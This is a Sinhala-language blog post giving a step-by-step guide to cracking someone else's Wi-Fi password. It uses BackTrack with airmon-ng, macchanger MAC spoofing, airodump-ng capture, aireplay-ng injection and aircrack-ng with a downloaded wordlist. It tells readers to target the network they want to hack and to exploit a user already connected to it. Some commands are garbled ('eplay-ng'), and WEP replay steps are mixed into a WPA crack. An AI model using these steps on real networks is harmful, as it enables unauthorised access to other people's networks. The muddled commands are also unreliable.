NEXT PAGE SOON

Monetize your website traffic with yX Media

කොහොමද Wifi network එකක password එකක් HACK කරන්නේ//??? (How to hack a wifi password)


WiFi තියෙනම් Compatible Wireless Adapter එකක් ඔයාල ගාව තියෙනවනෙ.BackTrack 5r3 නැති කට්ටිය මෙතනින් ගිහින් අරගන්න.Virtuual Machine එකෙන් ඔයාගෙ පරිගනකට ස්තාපනය කරගන්න.ඒකට මම බාවිතා කරේ  VmWare මෘදුකාංගය.

හරි ඔන්න එහෙනම් අපි වඩේට බහිමු.ඔයාල බැක්ට්‍රැක් දාගත්තනේ.දැන්  ඔයාල Shell  Commands එකක් Open කරගන්න.ඒකෙ මේ විදානය දෙන්න.එතකොට දැනට තියන WiFi නෙට්වර්ක් මොනවද කියලා පෙන්නනව....

ඔයාලට WiFi Hack කරන්න මෙන්න මේ ටික ඕන වෙනව

Compatible Wireless Adapter
Linax BackTrack 5r3 DVD
Password List Download





airmon-ng



මෙතන පෙන්නන ra0 කියන WiFi නෙට්වර්ක්  එක උපකාර කරගෙනයි මම ඉස්සරහට  ඔයාලට හැමදේම කියන්නෙ. ඔයාලා ra0 වෙනුවට භාවිතා කරන්න ඕනේ ඔයාලට හැක් කරන්න් ඕනේ WiFi නෙට්වර්ක්  එකේ නම හොඳේ.

දැන් මේ විදානය දෙන්න.

airmon-ng stop ra0 





මෙතනදි අපි කරන්නෙ හැක් කරන්න ඕනේ WiFi නෙට්වර්ක් එකේ මැක් ඇඩ්ර්ස් එක වෙනස් කරන්න.දැන් මේ විදානය දෙන්න.

ifconfig ra0 down




 දැන් මේ විදානය දෙන්න.


 macchanger --mac 00:11:22:33:44:55 ra0




දැන් මේ විදානය දෙන්න.
airmon-ng start ra0





මෙතනදි අපි කරන්නෙ අලුත් කරපු මැක් ඇඩ්ර්ස් එක නිවැරදි ආකාරයෙන් වැඩ කරනවද බලන එක. දැන් මේ විදානය දෙන්න.
airodump-ng ra0




මේකෙ BSSID Code එක Copy කරල තියාගන්න.මොකද ඉස්සරහට ඕන වෙනව.දැන් මේ විදානය දෙන්න.
airodump-ng -c (CHANNEL) -w (ESSID NAME) --bssid (BSSID NUMBER) ra0



 

මෙතනදි අපිට පුලුවන් අපි හැක් කරන්න යන WiFi නෙට්වර්ක් එකේ නියම නම,SSID එක හොයා ගන්න.. ඊට පස්සෙ අපිට් පුලුවන් අපි හැක් කරන්න් යන WiFi නෙට්වර්ක් එකට මේ වෙනකොට ලොග් වෙල් ඉන්න් කෙනෙක්ව හොයගන්න. දැන් මේ විදානය දෙන්න.
eplay-ng -1 0 -a (BSSID NUMBER) -h 00:11:22:33:44:55 -e (ESSID NAME) ra0




දැන් මේ විදානය දෙන්න.

aireplay-ng -3 -b (BSSID NUMBER) -h 00:11:22:33:44:55 ra0





දැන් මේ විදානය දෙන්න.
aircrack-ng -b (BSSID NUMBER) (ESSID NAME-01.cap)


ඊට පස්සෙ අපිට පුලුවන් දැනට ලොග් වෙල් ඉන්න කෙනාගේ උදවුවෙන් ලොග් වෙල ඉන්න WiFi නෙට්වර්ක් එකේ පාස්කී එක ලබා ගන්න. ඒකට පහල විදානය දෙන්න. මෙතන් list කියන තැනට අපි අර බාගත්ත පාස්වර්ඩ් ලිස්ට් එකේ පාත් එක දෙන්න ඕනේ.
aircrack-ng crackwpa-01.cap –w list




ඔබට මෙය තේරුනේ නැත්තාම් පහල තිබෙන video එක බලන්න 



මෙන්න මෙහෙමයි Wifi password එකක් Hack කරන්නේ .ගොඩක් ලොකු post එකක් තමා එත් ඔයලට නොතෙරෙන කරුනු මොනව හරි තියනවනන් අපි අපේ Blog එකෙන් පටන් අරගෙන තියනවා Contact Me කියලා සේවාවක් ඔයාලට පුලුවන් එකෙන් ඔයාගෙ ප්‍රශ්න අපිට ඉදිපත් කරන්න.එවගේම මෙ post එකට අපි  
http://pariganakaviplawaya.blogspot.com අඩවියෙන් සහය ලබා ගත් අතර එම අඩවියටත් ස්තුති පුදකරමි.එහෙනන් අපි කැපෙනවෝ ගැටලුවක් නන් Comment  එකක් දන්න.







EmoticonEmoticon